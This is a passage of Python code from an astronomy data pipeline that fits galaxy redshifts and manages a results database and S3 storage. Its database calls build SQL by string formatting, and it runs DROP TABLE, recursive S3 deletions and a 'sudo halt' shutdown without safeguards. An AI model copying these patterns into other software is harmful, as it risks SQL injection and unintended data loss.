    # on `root` and `zmax` leaking out of the loop above, and passes `engine`
    # as a spurious extra positional argument to engine.execute().
    res = engine.execute("DELETE from redshift_fit WHERE (root = '{0}')".format(root), engine)
    res = engine.execute("DELETE from redshift_fit_quasar WHERE (root = '{0}')".format(root), engine)
    res = engine.execute("DELETE from stellar_fit WHERE (root = '{0}')".format(root), engine)
    res = engine.execute("DELETE from photometry_apcorr WHERE (p_root = '{0}')".format(root), engine)

    if False:
        # Remove the whole thing
        res = engine.execute("DELETE from exposure_log WHERE (parent = '{0}')".format(root), engine)
        res = engine.execute("DELETE from charge_fields WHERE (field_root = '{0}')".format(root), engine)

    grizli_db.run_lambda_fits(root, phot_root=root, min_status=2, zr=[0.01, zmax], mag_limits=[15, 26], engine=engine)

    # for root in "j233844m5528 j105732p3620 j112416p1132 j113812m1134 j113848m1134 j122852p1046 j143200p0959 j152504p0423 j122056m0205 j122816m1132 j131452p2612".split():
    res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'q_z', 'q_z > -0.69 as q_z_TPR90', 'dlinesn'], where="AND status > 4 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'rgb', 'line'], show_hist=True)

    grizli_db.aws_rgb_thumbnails(root, engine=engine)

    os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png s3://grizli-v1/tables/'.format(root))
def aws_rgb_thumbnails(root, bucket='grizli-v1', engine=None, thumb_args={}, ids=None, verbose=True, res=None):
    """
    Make thumbnails for everything that has an entry in the redshift_fit table
    """
    from grizli.aws import aws_drizzler, fit_redshift_lambda

    if engine is None:
        engine = get_db_engine(echo=False)

    # Default target list: all fit objects in the field with valid coordinates
    if res is None:
        res = from_sql("SELECT root, id, ra, dec FROM redshift_fit WHERE root = '{0}' AND ra > 0".format(root), engine)

    aws_prep_dir = 's3://{0}/Pipeline/{1}/Prep/'.format(bucket, root)
    aws_bucket = 's3://{0}/Pipeline/{1}/Thumbnails/'.format(bucket, root)

    # Default lambda event payload
    event = {'make_segmentation_figure': True,
             'aws_prep_dir': aws_prep_dir,
             'single_output': True,
             'combine_similar_filters': True,
             'show_filters': ['visb', 'visr', 'y', 'j', 'h'],
             'include_ir_psf': False,
             'include_saturated': True,
             'subtract_median': True,
             'sync_fits': True,
             'thumb_height': 2.0,
             'scale_ab': 21,
             'aws_bucket': aws_bucket,
             'master': None,
             'rgb_params': {'xsize': 4, 'output_dpi': None,
                            'rgb_min': -0.01, 'add_labels': False,
                            'output_format': 'png', 'show_ir': False,
                            'scl': 2, 'suffix': '.rgb', 'mask_empty': False,
                            'tick_interval': 1, 'pl': 1},
             'remove': True,
             'filters': ['f160w', 'f140w', 'f125w', 'f105w', 'f110w', 'f098m',
                         'f850lp', 'f814w', 'f775w', 'f606w', 'f475w',
                         'f555w', 'f600lp', 'f390w', 'f350lp'],
             'half_optical_pixscale': True,
             'theta': 0,
             'kernel': 'square',
             'pixfrac': 0.33,
             'wcs': None,
             'size': 6,
             'pixscale': 0.1}

    # Caller-supplied arguments override the defaults above
    event.update(thumb_args)

    # Dispatch one lambda event per (optionally filtered) object
    for root_i, src_id, src_ra, src_dec in zip(res['root'], res['id'],
                                               res['ra'], res['dec']):
        if (ids is not None) and (src_id not in ids):
            continue

        event['ra'] = src_ra
        event['dec'] = src_dec
        event['label'] = '{0}_{1:05d}'.format(root_i, src_id)

        fit_redshift_lambda.send_event_lambda(event, verbose=verbose)
def count_sources_for_bad_persistence():
    """
    Count the number of extracted objects for each id and look for fields
    with few objects, which are usually problems with the persistence mask
    """
    import pandas as pd

    from grizli.aws import db as grizli_db

    from grizli import utils
    engine = grizli_db.get_db_engine(echo=False)

    # Number of matches per field
    counts = pd.read_sql_query("select root, COUNT(root) as n from redshift_fit, photometry_apcorr where phot_root = p_root AND id = p_id AND bic_diff > 5 AND mag_auto < 24 group by root;", engine)

    counts = utils.GTable.from_pandas(counts)

    # Fields sorted by increasing count; inspect the low end interactively.
    # NOTE(review): `so` and `sh` are unused scratch values -- `sh` is the
    # shell recipe for reprocessing a problem field with a stricter
    # persistence threshold.
    so = np.argsort(counts['n'])

    sh = """
BUCKET=grizli-v
root=j113812m1134

aws s3 rm --recursive s3://grizli-v1/Pipeline/${root}/ --include "*"
grism_run_single.sh ${root} --run_fine_alignment=True --extra_filters=g800l --bucket=grizli-v1 --preprocess_args.skip_single_optical_visits=True --mask_spikes=True --persistence_args.err_threshold=1
"""
def add_missing_photometry():
    """
    Push photometry catalogs into ``photometry_apcorr`` for fields that
    have fit results but no photometry rows, generating the aperture-
    corrected catalog with eazy when only the raw ``_phot.fits`` exists.

    NOTE(review): this is interactive scratch code -- `res`/`orig_roots`
    are reassigned several times and only the last assignments feed the
    loop below.
    """
    # Add missing photometry
    import os
    import pandas as pd
    from grizli.aws import db as grizli_db
    from grizli.pipeline import photoz
    from grizli import utils

    engine = grizli_db.get_db_engine(echo=False)

    res = pd.read_sql_query("select distinct root from redshift_fit where root like 'j%%'", engine)['root'].tolist()
    orig_roots = pd.read_sql_query('select distinct p_root as root from photometry_apcorr', engine)['root'].tolist()

    # Missing grism fields?
    res = pd.read_sql_query("select field_root as root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where (field_t_g800l > 0 OR field_t_g141 > 0 OR field_t_g102 > 0) AND log LIKE '%%inish%%';", engine)['root'].tolist()
    orig_roots = pd.read_sql_query('select distinct root from redshift_fit', engine)['root'].tolist()

    # All photometry
    res = pd.read_sql_query("select field_root as root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where nassoc < 200 AND log LIKE '%%inish%%' AND field_root LIKE 'j%%';", engine)['root'].tolist()
    orig_roots = pd.read_sql_query('select distinct p_root as root from photometry_apcorr', engine)['root'].tolist()

    count = 0
    for root in res:
        if root not in orig_roots:
            #break
            count += 1
            print(count, root)

            # Fetch the catalogs from Extractions/, falling back to Prep/
            os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_phot_apcorr.fits .'.format(root))
            os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_phot.fits .'.format(root))

            if not os.path.exists('{0}_phot_apcorr.fits'.format(root)):
                os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Prep/{0}_phot_apcorr.fits .'.format(root))
                os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Prep/{0}_phot.fits .'.format(root))

            if os.path.exists('{0}_phot_apcorr.fits'.format(root)):
                grizli_db.add_phot_to_db(root, delete=False, engine=engine)
            else:
                if os.path.exists('{0}_phot.fits'.format(root)):
                    # Make the apcorr file with an eazy photo-z run
                    utils.set_warnings()

                    total_flux = 'flux_auto'
                    try:
                        obj = photoz.eazy_photoz(root, object_only=True,
                                  apply_prior=False, beta_prior=True,
                                  aper_ix=1,
                                  force=True,
                                  get_external_photometry=False,
                                  compute_residuals=False,
                                  total_flux=total_flux)
                    except:
                        # NOTE(review): bare except skips the field on any error
                        continue

                    grizli_db.add_phot_to_db(root, delete=False,
                                             engine=engine, nmax=500)

    # Below: manual one-off ingests for the deep legacy fields, with the
    # `copy` strings recording the aws commands to stage the catalogs first.

    # 3D-HST
    copy = """
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/egs-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot_apcorr.fits --acl public-read
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/egs-mosaic_phot.fits s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot.fits --acl public-read
"""
    grizli_db.run_lambda_fits('egs-grism-j141956p5255', min_status=6, zr=[0.01, 3.2])

    copy = """
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/uds-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/uds-grism-j021732m0512/Extractions/uds-grism-j021732m0512_phot_apcorr.fits --acl public-read
"""
    grizli_db.run_lambda_fits('uds-grism-j021732m0512', min_status=6, zr=[0.01, 3.2])

    # GDS
    copy = """
aws s3 rm s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-grism-j033236m2748_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-g800l-j033236m2748_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/gds-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/gds-grism-j033236m2748_phot_apcorr.fits --acl public-read
aws s3 cp s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/gds-grism-j033236m2748_phot_apcorr.fits s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/gds-g800l-j033236m2748_phot_apcorr.fits --acl public-read
"""
    grizli_db.run_lambda_fits('gds-grism-j033236m2748', phot_root='gds-grism-j033236m2748', min_status=6, zr=[0.01, 3.2], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
    grizli_db.run_lambda_fits('gds-g800l-j033236m2748', phot_root='gds-grism-j033236m2748', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})

    # GDN
    copy = """
#aws s3 rm s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-g800l-j033236m2748_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/ --recursive --exclude "*" --include "gdn-grism-j123656p6215_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gdn-g800l-j123656p6215/Extractions/ --recursive --exclude "*" --include "gdn-g800l-j123656p6215_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/gdn-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/gdn-grism-j123656p6215_phot_apcorr.fits --acl public-read
aws s3 cp s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/gdn-grism-j123656p6215_phot_apcorr.fits s3://grizli-v1/Pipeline/gdn-g800l-j123656p6215/Extractions/gdn-g800l-j123656p6215_phot_apcorr.fits --acl public-read
"""
    grizli_db.run_lambda_fits('gdn-grism-j123656p6215', phot_root='gdn-grism-j123656p6215', min_status=6, zr=[0.01, 3.2], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
    grizli_db.run_lambda_fits('gdn-g800l-j123656p6215', phot_root='gdn-grism-j123656p6215', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})

    # 3D-HST G800L
    copy = """
aws s3 rm s3://grizli-v1/Pipeline/egs-g800l-j141956p5255/Extractions/ --recursive --exclude "*" --include "egs-g800l-j141956p5255_[0-9]*"
aws s3 cp s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot_apcorr.fits s3://grizli-v1/Pipeline/egs-g800l-j141956p5255/Extractions/egs-g800l-j141956p5255_phot_apcorr.fits --acl public-read
"""
    grizli_db.run_lambda_fits('egs-g800l-j141956p5255', phot_root='egs-grism-j141956p5255', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})

    res = grizli_db.wait_on_db_update('egs-g800l-j141956p5255', dt=15, n_iter=120, engine=engine)
    res = grizli_db.wait_on_db_update('uds-g800l-j021732m0512', dt=15, n_iter=120, engine=engine)

    # UDS
    copy = """
aws s3 rm s3://grizli-v1/Pipeline/uds-g800l-j021732m0512/Extractions/ --recursive --exclude "*" --include "uds-g800l-j021732m0512_[0-9]*"
aws s3 cp s3://grizli-v1/Pipeline/uds-grism-j021732m0512/Extractions/uds-grism-j021732m0512_phot_apcorr.fits s3://grizli-v1/Pipeline/uds-g800l-j021732m0512/Extractions/uds-g800l-j021732m0512_phot_apcorr.fits --acl public-read
"""
    grizli_db.run_lambda_fits('uds-g800l-j021732m0512', phot_root='uds-grism-j021732m0512', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
    grizli_db.run_lambda_fits('egs-g800l-j141956p5255', phot_root='egs-grism-j141956p5255', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})

    # Cosmos on oliveraws
    copy = """
aws s3 rm s3://grizli-cosmos-v2/Pipeline/cos-grism-j100012p0210/Extractions/ --recursive --exclude "*" --include "cos-grism-j100012p0210_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/Cosmos/cos-cnd-mosaic_phot_apcorr.fits s3://grizli-cosmos-v2/Pipeline/cos-grism-j100012p0210/Extractions/cos-grism-j100012p0210_phot_apcorr.fits --acl public-read
"""
    grizli_db.run_lambda_fits('cos-grism-j100012p0210', min_status=6, zr=[0.01, 3.2], mag_limits=[17, 17.1], bucket='grizli-cosmos-v2')

    os.system('sudo halt')
def set_column_formats(info, extra=None, convert_mtime=True, **kwargs):
    """
    Set predefined format strings of table columns

    Parameters
    ----------
    info : `astropy.table.Table`
        Data table, updated in place

    extra : dict, optional
        Dictionary with extra format codes as values and column names as keys.
        These override the built-in defaults.

    convert_mtime : bool
        If ``'mtime'`` column found in `info`, convert all time strings to
        sortable ISO format with `~grizli.utils.ctime_to_iso`.
    """
    # Sentinel default rather than a shared mutable ``extra={}`` default
    if extra is None:
        extra = {}

    # Print formats
    formats = {}
    formats['ra'] = formats['dec'] = '.5f'
    formats['mag_auto'] = formats['delta_z'] = '.2f'
    formats['chinu'] = formats['chimin'] = formats['chimax'] = '.1f'
    formats['bic_diff'] = formats['bic_temp'] = formats['bic_spl'] = '.1f'
    formats['bic_poly'] = '.1f'
    formats['dlinesn'] = formats['bic_spl'] = '.1f'

    formats['flux_radius'] = formats['flux_radius_20'] = '.1f'
    formats['flux_radius_90'] = '.1f'
    formats['log_pdf_max'] = formats['log_risk'] = '.1f'
    formats['d4000'] = formats['d4000_e'] = '.2f'
    formats['dn4000'] = formats['dn4000_e'] = '.2f'

    # NOTE(review): 'reshift' looks like a typo for 'redshift', but it is
    # kept as-is because "fixing" it would change which column is formatted
    formats['z_spec'] = formats['z_map'] = formats['reshift'] = '.3f'
    formats['z_spec_dr'] = '.1f'

    formats['t_g141'] = formats['t_g102'] = formats['t_g800l'] = '.0f'
    formats['zwidth1'] = formats['zw1'] = '.3f'
    formats['zwidth2'] = formats['zw2'] = '.3f'

    formats['q_z'] = '.2f'
    formats['dz'] = '.3f'

    # User-supplied formats take precedence
    for k in extra:
        formats[k] = extra[k]

    # Exact name match first, then pattern-based fallbacks
    for c in info.colnames:
        if c in formats:
            info[c].format = formats[c]
        elif c.startswith('sn_'):
            info[c].format = '.1f'
        elif c.startswith('mag_'):
            info[c].format = '.2f'
        elif '_ujy' in c:
            info[c].format = '.2f'
        elif c.startswith('ew_'):
            info[c].format = '.1f'
        elif ('q_z' in c):
            info[c].format = '.2f'
        elif ('zw' in c) | ('z_map' in c):
            info[c].format = '.3f'
        elif ('chinu' in c):
            info[c].format = '.1f'
        elif c.startswith('bic_'):
            info[c].format = '.1f'
        elif c in ['z02', 'z16', 'z50', 'z84', 'z97']:
            info[c].format = '.3f'
        elif c[:4] in ['splf', 'sple']:
            info[c].format = '.1e'
        elif c.startswith('flux_') | c.startswith('err_'):
            info[c].format = '.1e'

    # Convert ctime-style strings to sortable ISO format
    if convert_mtime & ('mtime' in info.colnames):
        iso_times = [utils.ctime_to_iso(m, verbose=False, strip_decimal=True)
                     for m in info['mtime']]

        info['mtime'] = iso_times
def query_from_ds9(ds9, radius=5, engine=None, extra_cols=['mag_auto', 'z_map', 'bic_diff', 't_g800l', 't_g102', 't_g141'], extra_query='', table_root='/tmp/ds9_query'):
    """
    Make a table by running a query for objects based on a DS9 pan position

    Parameters
    ----------
    ds9 : DS9 object
        Display whose current pan position defines the search center.

    radius : float
        Search radius, arcsec.

    engine : `sqlalchemy` engine, optional
        Database connection; created if not provided.

    extra_cols : list
        Extra columns to include beyond root/id/status/ra/dec.

    extra_query : str
        Additional SQL appended to the WHERE clause.

    table_root : str
        Output rootname for the HTML table and region file.

    Returns
    -------
    q : `~grizli.utils.GTable`
        Matched objects sorted by distance from the pan position.
    """
    from grizli import utils, prep

    if engine is None:
        engine = get_db_engine(echo=False)

    # Pan position, "ra dec" in decimal degrees.
    # (np.cast was deprecated and removed in NumPy 2.0; use an explicit dtype)
    ra, dec = np.asarray(ds9.get('pan fk5').split(), dtype=float)

    # Box half-sizes in degrees, with cos(dec) correction for RA
    dd = radius/3600.
    dr = dd/np.cos(dec/180*np.pi)

    min_cols = ['root', 'id', 'status', 'ra', 'dec']
    colstr = ','.join(min_cols + extra_cols)

    q = from_sql(f'select {colstr} '
                 f'from redshift_fit natural join photometry_apcorr '
                 f'where ra > {ra-dr} AND ra < {ra+dr}'
                 f' AND dec > {dec-dd} and dec < {dec+dd}' + extra_query,
                 engine)

    # Single-row table at the pan position for a sky match
    tt = utils.GTable()
    tt['ra'] = [ra]
    tt['dec'] = [dec]

    _idx, _dr = tt.match_to_catalog_sky(q)
    q['_dr'] = _dr
    q['_dr'].format = '.2f'

    # Sort by increasing separation
    so = np.argsort(q['_dr'])

    make_html_table(sync=None, res=q[so], use_json=False, table_root=table_root, sort_column=('_dr', 1))

    comment = [f'{id}' for id in q['id'][so]]
    prep.table_to_regions(q[so], table_root+'.reg', comment=comment)

    return q[so]
def make_html_table(engine=None, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e'], where="AND status >= 5 AND root='j163852p4039'", tables=[], table_root='query', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], sort_column=('bic_diff', -1), fit_table='redshift_fit', verbose=True, get_sql=False, res=None, show_hist=False, extra_formats={}, use_json=True, use_join=False):
    """
    Query the fit database joined with the photometry table and write a
    sortable HTML summary table, optionally with inline PNG cutouts and a
    redshift histogram, synced to S3.

    Parameters
    ----------
    engine : `sqlalchemy` engine, optional
        Database connection; created if not provided.

    columns : list
        Columns (or SQL expressions with aliases) to select.

    where : str
        Extra WHERE clauses, starting with "AND".

    tables : list
        Additional tables for the FROM clause.

    table_root : str
        Output rootname of the HTML/JSON files.

    sync : str or None
        S3 path to sync the outputs to; skip upload if falsy.

    png_ext : list
        Cutout extensions to render as image columns.

    sort_column : (str, int)
        Column name and direction (+1/-1) for the initial sort.

    fit_table : str
        Primary fit table to query.

    get_sql : bool
        Return the SQL string instead of running the query.

    res : `~pandas.DataFrame`, optional
        Pre-computed query result to use instead of querying.

    show_hist : bool
        Also make a ``{table_root}_zhist.png`` redshift histogram.

    Returns
    -------
    res : `~pandas.DataFrame`
        The query result (or the SQL string if `get_sql`).
    """
    import time

    import numpy as np
    import matplotlib.pyplot as plt
    import pandas as pd

    from grizli import utils
    from grizli.aws import db as grizli_db

    if engine is None:
        engine = get_db_engine(echo=False)

    if len(tables) > 0:
        extra_tables = ','+','.join(tables)
    else:
        extra_tables = ''

    if use_join:
        query = "SELECT {0} FROM {1} NATURAL JOIN photometry_apcorr WHERE {2};".format(','.join(columns), fit_table, where)
        query = query.replace('WHERE AND', 'AND')
    else:
        query = "SELECT {0} FROM photometry_apcorr, {3}{1} WHERE phot_root = p_root AND id = p_id {2};".format(','.join(columns), extra_tables, where, fit_table)

    if get_sql:
        return query

    if res is not None:
        info = res
    else:
        res = pd.read_sql_query(query, engine)
        info = utils.GTable.from_pandas(res)

        if verbose:
            print('Query: {0}\n Results N={1}'.format(query, len(res)))

        if 'cdf_z' in info.colnames:
            info.remove_column('cdf_z')

        # Strip the photometry-table 'p_' prefixes for display
        for c in info.colnames:
            if c.startswith('p_'):
                try:
                    info.rename_column(c, c[2:])
                except:
                    pass

    all_columns = info.colnames.copy()

    # Object index linked to a Vizier cone search at the object position
    if 'idx' not in info.colnames:
        idx = ['<a href="http://vizier.u-strasbg.fr/viz-bin/VizieR?-c={0:.6f}+{1:.6f}&-c.rs=2">#{2:05d}</a>'.format(info['ra'][i], info['dec'][i], info['id'][i]) for i in range(len(info))]
        info['idx'] = idx
        all_columns.insert(0, 'idx')
        all_columns.pop(all_columns.index('id'))

    set_column_formats(info, extra=extra_formats)

    print('Sort: ', sort_column, sort_column[0] in all_columns)

    # Default to the original row order; previously `so` was undefined
    # (NameError) when the sort column wasn't in the table
    so = np.arange(len(info))

    if sort_column[0] in all_columns:
        scol = info[sort_column[0]]
        if hasattr(scol, 'mask'):
            # Push masked values to the end of the sort
            sdata = scol.filled(fill_value=-np.inf).data
        else:
            sdata = scol

        so = np.argsort(sdata)[::sort_column[1]]
        #info = info[so[::sort_column[1]]]

    # PNG columns
    AWS = 'https://s3.amazonaws.com/grizli-v1/Pipeline'
    bucket = ['grizli-cosmos-v2' if r.startswith('cos-') else 'grizli-v1' for r in info['root']]

    for ext in png_ext:
        if ext == 'thumb':
            subdir = 'Thumbnails'
            print(ext, subdir)
        elif ext == 'rgb':
            subdir = 'Thumbnails'
        else:
            subdir = 'Extractions'

        if 'png_{0}'.format(ext) not in info.colnames:
            png = ['{0}_{1:05d}.{2}.png'.format(root, id, ext) for root, id in zip(info['root'], info['id'])]
            if ext == 'rgb':
                # Hover swaps the RGB image with the segmentation image
                js = '<a href={0}/{2}><img src={0}/{1} onmouseover="this.src = this.src.replace(\'rgb.pn\', \'seg.pn\')" onmouseout="this.src = this.src.replace(\'seg.pn\', \'rgb.pn\')" height=200></a>'

                paths = ['{0}/{1}/{2}'.format(AWS.replace('grizli-v1', buck),
                                              root, subdir)
                         for buck, root in zip(bucket, info['root'])]

                png_url = [js.format(path, p,
                                     p.replace('.rgb.png', '.thumb.png'))
                           for path, p in zip(paths, png)]

                info['png_{0}'.format('rgb')] = png_url
            else:
                info['png_{0}'.format(ext)] = ['<a href="{0}/{1}/{2}/{3}"><img src={0}/{1}/{2}/{3} height=200></a>'.format(AWS.replace('grizli-v1', buck), root, subdir, p) for buck, root, p in zip(bucket, info['root'], png)]

            all_columns.append('png_{0}'.format(ext))

    # Only non-string columns get sort controls
    sortable = []
    for c in all_columns:
        if not hasattr(info[c][0], 'upper'):
            sortable.append(c)

    info[all_columns][so].write_sortable_html('{0}.html'.format(table_root), replace_braces=True, localhost=False, max_lines=1e5, table_id=None, table_class='display compact', css=None, filter_columns=sortable, buttons=['csv'], toggle=True, use_json=use_json)

    if show_hist:
        from matplotlib.ticker import FixedLocator, AutoLocator, MaxNLocator

        xti = xt = np.arange(0, 3.6, 0.5)
        loc = np.arange(0, 3.6, 0.1)
        bins = utils.log_zgrid([0.03, 3.5], 0.01)

        fig = plt.figure(figsize=[8, 4])
        ax = fig.add_subplot(111)

        # `normed` was removed from Axes.hist in matplotlib 3.1; `density`
        # is the replacement with the same False default
        ax.hist(np.log(1+res['z_map']), bins=np.log(1+bins), color='k',
                alpha=0.2, label=table_root, density=False)

        clip = res['bic_diff'].values > 30
        ax.hist(np.log(1+res['z_map'].values[clip]), bins=np.log(1+bins),
                color='r', alpha=0.3, density=False)

        xts = ax.set_xticks(np.log(1+xt))
        xtl = ax.set_xticklabels(xti)

        ax.xaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
        ax.yaxis.set_major_locator(MaxNLocator(integer=True))

        ax.set_xlabel('z_map')
        ax.set_ylabel(r'$N$')

        # Label to show line mis-id: Ha <-> [OIII] confusion offsets
        dz_wrong = (6563.-5007)/5007
        ax.plot(np.arange(5)*dz_wrong, np.ones(5)*ax.get_ylim()[1], marker='.', markerfacecolor='w', markeredgecolor='w', color='r', markersize=10)

        ax.set_xlim(0, np.log(1+3.7))
        ax.grid()
        ax.legend(loc='upper right')

        fig.tight_layout(pad=0.1)
        fig.text(1-0.02, 0.02, utils.nowtime(), ha='right', va='bottom',
                 transform=fig.transFigure, fontsize=5)

        fig.savefig('{0}_zhist.png'.format(table_root))

    if sync:
        os.system('aws s3 sync ./ {0} --exclude "*" --include "{1}.html" --include "{1}.json" --include "{1}_zhist.png" --acl public-read'.format(sync, table_root))

    return res
def get_exposure_info():
    """
    Get exposure information from the MAST databases
    """
    import mastquery.query

    # Master visit-file version; only the last assignment is used
    master = 'grizli-v1-19.12.04'
    master = 'grizli-v1-19.12.05'
    master = 'grizli-v1-20.10.12'

    tab = utils.read_catalog('{0}_visits.fits'.format(master))
    all_visits = np.load('{0}_visits.npy'.format(master), allow_pickle=True)[0]

    # Flat list of exposure files across all visits
    all_files = []
    for v in all_visits:
        all_files.extend(v['files'])

    # Program IDs (characters 1:4 of the file rootname), counted and
    # sorted by decreasing number of exposures
    prog = [f[1:4] for f in all_files]
    _res = np.unique(np.array(prog), return_counts=True)

    t = utils.GTable()
    t['prog'] = _res[0]
    t['count'] = _res[1]
    so = np.argsort(t['count'])
    t = t[so[::-1]]

    # Query MAST once per program, caching results as local FITS files
    for pr in t['prog']:
        if os.path.exists('{0}_query.fits'.format(pr)):
            #print('Skip ', pr)
            continue

        print(pr)
        try:
            _q = mastquery.query.run_query(obs_id='[ij]{0}*'.format(pr))
            _p = mastquery.query.get_products_table(_q)
        except:
            # NOTE(review): bare except skips the program on any failure
            continue

        _q.write('{0}_query.fits'.format(pr))
        _p.write('{0}_prod.fits'.format(pr))

    # Send to AWS
    from grizli.aws import db
    import pandas as pd
    from astropy.table import Table
    engine = db.get_db_engine()

    # Upload the cached query tables into the mast_query DB table
    files = glob.glob('*query.fits')
    files.sort()

    cols = ['obs_id', 'target', 'target_ra', 'target_dec', 't_min', 't_max', 'exptime', 'wavelength_region', 'filter', 'em_min', 'em_max', 'target_classification', 'obs_title', 't_obs_release', 'instrument_name', 'proposal_pi', 'proposal_id', 'proposal_type', 'sregion', 'dataRights', 'mtFlag', 'obsid', 'objID', 'visit']

    for i, file in enumerate(files):
        print(file)

        _q = Table.read(file, character_as_bytes=False)
        # NOTE(review): np.cast was deprecated and removed in NumPy 2.0;
        # these would need .astype() on newer numpy
        _q['proposal_id'] = np.cast[np.int16](_q['proposal_id'])
        _q['obsid'] = np.cast[np.int64](_q['obsid'])
        _q['objID'] = np.cast[np.int64](_q['objID'])
        _q.rename_column('ra', 'target_ra')
        _q.rename_column('dec', 'target_dec')
        _q.rename_column('footprint', 'sregion')
        df = _q[cols].to_pandas()
        df.to_sql('mast_query', engine, index=False, if_exists='append', method='multi')

    # Upload the product tables into mast_products
    files = glob.glob('*_prod.fits')
    files.sort()

    cols = ['obsid', 'dataset']
    for i, file in enumerate(files):
        print(i, file)

        _p = Table.read(file, character_as_bytes=False)
        _p['obsid'] = np.cast[np.int64](_p['obsid'])
        # Dataset rootname: observation id with the last character dropped
        _p['dataset'] = [d[:-1] for d in _p['observation_id']]
        df = _p[cols].to_pandas()
        df.to_sql('mast_products', engine, index=False, if_exists='append', method='multi')

    ##########
    # Exposure log

    # Initialize, adding an array column manually for the footprints
    v = all_visits[0]
    N = len(v['files'])
    fps = [np.array(fp.convex_hull.boundary.xy)[:, :-1].tolist() for fp in v['footprints']]
    df = pd.DataFrame()
    df['file'] = [f.split('_')[0] for f in v['files']]
    df['dataset'] = [f.split('_')[0][:-1] for f in v['files']]
    df['extension'] = [f.split('_')[1][:3] for f in v['files']]
    df['filter'] = v['filter']
    df['parent'] = v['parent']
    df['awspath'] = v['awspath']
    df['product'] = v['product']
    df['filter'] = v['product'].split('-')[-1]

    df['ra'] = [fp.centroid.xy[0][0] for fp in v['footprints']]
    df['dec'] = [fp.centroid.xy[1][0] for fp in v['footprints']]
    # Footprint area in arcmin-like units with a cos(dec) correction
    df['area'] = [fp.area*np.cos(df['dec'][i]/180*np.pi)*3600 for i, fp in enumerate(v['footprints'])]

    # Make table: create the schema from the first visit, add the array
    # footprint column, then empty the table and add the extra columns
    engine.execute('drop table exposure_log;')
    df.to_sql('exposure_log', engine, index=False, if_exists='append', method='multi')
    engine.execute('alter table exposure_log add column footprint float [];')
    engine.execute('delete from exposure_log where True;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN mdrizsky float;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN exptime float;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN expstart float;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN ndq int;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN expflag VARCHAR;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN sunangle float;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky101 real;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky102 real;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky103 real;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN persnpix integer;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN perslevl real;')

    # Already-loaded exposures and valid charge fields
    _exp = db.from_sql("select distinct(file) from exposure_log", engine)
    db_files = np.unique(_exp['file'])

    charge = db.from_sql("select * from charge_fields", engine)

    # Batch inserts: accumulate per-visit frames and flush every SKIP rows
    SKIP = 1000
    df0 = None

    for i, v in enumerate(all_visits):
        _count = np.sum([f.split('_')[0] in db_files for f in v['files']])
        if _count == len(v['files']):
            continue

        if v['parent'] not in charge['field_root']:
            print('Warning: {0} not in charge["field_root"]'.format(v['parent']))
            continue

        print(i, v['parent'], v['product'], _count, len(v['files']))

        N = len(v['files'])
